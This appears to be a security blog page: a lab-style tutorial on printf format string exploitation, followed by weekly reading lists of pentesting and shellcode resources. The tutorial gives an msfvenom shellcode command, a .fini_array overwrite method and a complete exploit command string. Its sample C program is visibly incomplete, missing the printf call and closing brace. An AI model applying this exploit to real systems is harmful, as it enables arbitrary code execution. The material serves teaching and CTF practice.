printf Format String Exploitation

The format string in a printf statement is responsible for significant flow control within the program, and, if attacker-controlled, can be used to exploit the application in various ways. Specifically, an attacker can read and write arbitrary memory.

Reading memory can be accomplished through the usual operators, and the GNU extension of %<x>$ allows you to jump through the stack to arbitrary positions (as a multiple of the addressing size, anyway). The %n format specifier allows to write to a memory address: the address at that point on the stack is taken as an int *, and the number of bytes output so far will be written to the address. So this allows us to write a value by outputting the number of bytes for the value we want to write.

I’ll discuss exploitation with a simple example, as you might see in a wargame.

Basic steps:

  1. Figure out where your buffer is on the stack.
  2. Figure out where you want to write.
  3. Figure out what you want to write.
  4. Put the exploit together.

Here’s what we’ll use for our sample vulnerable program. For this simple case, I’ve marked the stack executable and am using a system with ASLR disabled.

#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if(argc < 2) return 1;

    strncpy(buf, argv[1], BUF_SIZE-1);

    return 0;

Let’s figure out where our buffer is on the stack, relative to the stack of the printf call. It’s easy enough to do: supply something like AAAA%<x>$p where <x> is a position on the stack, starting from 1 and going up. When you see ‘AAAA0x41414141’ as your output, you’ve found your format string. In this case, the format string is 6 words up the stack.

So, since we can write to memory, where do we want to write? We need something that will be executed after the printf, which severely limits our options. The first option that comes to mind is to overwrite the saved EIP, but most likely we don’t know the exact address where that’s saved, and the stack can shift around quite easily (due to argument lengths, environment variables, etc.). What about something more fixed?

Linux ELF binaries contain a section known as .fini_array, which is defined as “an array of function pointers that contributes to a single termination array for the executable or shared object containing the section.” In a simple binary like this, this section contains only a single function pointer, but that’s ok, because we can overwrite this pointer to point to our shellcode. Since the binary exits almost immediately after calling printf, there’s no problem in waiting for the .fini_array pointers to be called. With objdump -h, we can see the section headers, and find our section:

$ objdump -h printf
 19 .fini_array   00000004  080495b0  080495b0  000005b0  2**2
                  CONTENTS, ALLOC, LOAD, DATA

As expected, it’s 4 bytes long, and located at 0x080495b0, so now we have our address to overwrite.

So what do we want to write there? Clearly the address of our shellcode. We could write our shellcode to the printf buffer, but we’d need to get that address just right, or perhaps include a large nopsled. My favorite trick is to store the shellcode in an environment variable. It’s easy to predict the address (if you don’t change the environment) by writing a small program to spit it out, and, if you don’t feel like writing your own shellcode, msfvenom will provide you with a convenient shellcode in bash form: msfvenom -p linux/x86/exec CMD=/bin/sh -f bash -b '\x00'.

So, stick your shellcode into an environment variable and get its address. So long as the environment doesn’t change, that address will remain constant for all programs invoked from that shell. In my case, I got 0xffffdef2. Because the value is sufficiently large, I’ll actually split it into two 16 bit writes, but the %n operator always writes an int at a time (32 bits), so we have to do it carefully to avoid overwriting ourselves!

Writing from lower to higher works (we’re on a little-endian system, remember!) so we write 0xdef2 to the lower address, then 0xffff to the higher address. Let’s start constructing our format string. First, we’ll need both the lowest address and the one two bytes past it, then output our first value minus 8 bytes, write it to memory, then repeat for the 2nd.

The general format at this point is: <destination address><destination address + 2>%<0xdef2 - 8>c%6$n%<0xffff-0xdef2>c%7$n

Putting it together:
./printf $'\xb0\x95\x04\x08\xb2\x95\x04\x08%57066c%6$n%8461c%7$n' sh$

Weekly Reading List for 2/8/14

Android Pentesting Guides

I’ve been reading a lot about Android pentesting this week, so rather than summarizing each one, here’s a list of useful reading for Android pentesting.

Useful Lab Settings

Maybe you want to test something with an executable stack, ASLR off, or otherwise disable some security feature? This article describes settings for NX, ASLR, and SSP on Linux boxes. More details here.

OWASP Security Testing Guide

I can’t believe I didn’t know about OWASP’s security testing guide before. Though it was published a few years ago, it’s pretty much still relevant, and they’re working on a v4.0.

Weekly Reading List for 2/1/14

Previews for BSides SF 2014

A couple of new articles have been posted with previews of this year’s BSides San Francisco. Akamai has a preview of several talks and Tripwire previews a day in the life of an information security researcher.

Application Whitelist Bypass

@infosecsmith2 guest posts over at Room362 about using IEexec.exe to bypass application whitelisting.

Custom Wordlists

Chief Monkey over at IT Security Toolbox reports on a tool called SmeegeScrape that allows you to build a wordlist from the contents of a system. He reports on it in the context of a forensics task, but it seems like it would be a great option for penetration testing as well.

Encryption with Plausible Deniability

Michael Mimoso at ThreatPost describes a new encryption mechanism called ‘Honey Encryption’. The idea is that an attacker can get a plausible decryption output from a wrong password, making it harder to know if a decryption was valid when performing offline attacks.

The reading list is a little short this week – it’s been crazy.

Weekly Reading List for 1/25/14

This week, we’re focusing on binary exploitation and reversing. (Thanks to Ghost in the Shellcode for making me feel stupid with all their binary pwning challenges!)

Basic Shellcode Examples

Gal Badishi has a great set of Basic Shellcode Examples. It’s almost two years old, but a good primer into how basic shellcode works. x86 hasn’t changed (yes, I’m ignoring x64 for now), so still quite a relevant resource for those of us who have leaned on msfvenom/msfpayload for our payload needs.

Project Shellcode

Going beyond the basic, Project Shellcode is a site full of resources for crafting and understanding shellcode. Based on training classes used at BlackHat 2012, they walk through all the steps in writing shellcode.

x86 Assembly Guide

If the shellcode above looked like Greek, perhaps it’s time for an x86 assembly primer/refresher. UVA’s CS department has you covered with their x86 Assembly Guide, used in their CS216 class. It also has some useful reference to how the instructions work.

GNU Debugger Tutorial

If you want to observe the behavior of a running program, you’re going to want a debugger. If you’re running on Linux and haven’t spent the $1200 for IDA pro, you’re probably using the GNU Debugger, better known as GDB. RMS (no, not that RMS) has a great gdb tutorial.

Ghost in the Shellcode 2014

A quick Ghost in the Shellcode 2014 summary. Great CTF, but you better know your binary exploitation. I’m pretty happy with the overall 27th finish Shadow Cats managed. Here’s a summary of our team writeups, the first 3 by me, the last one by Dan.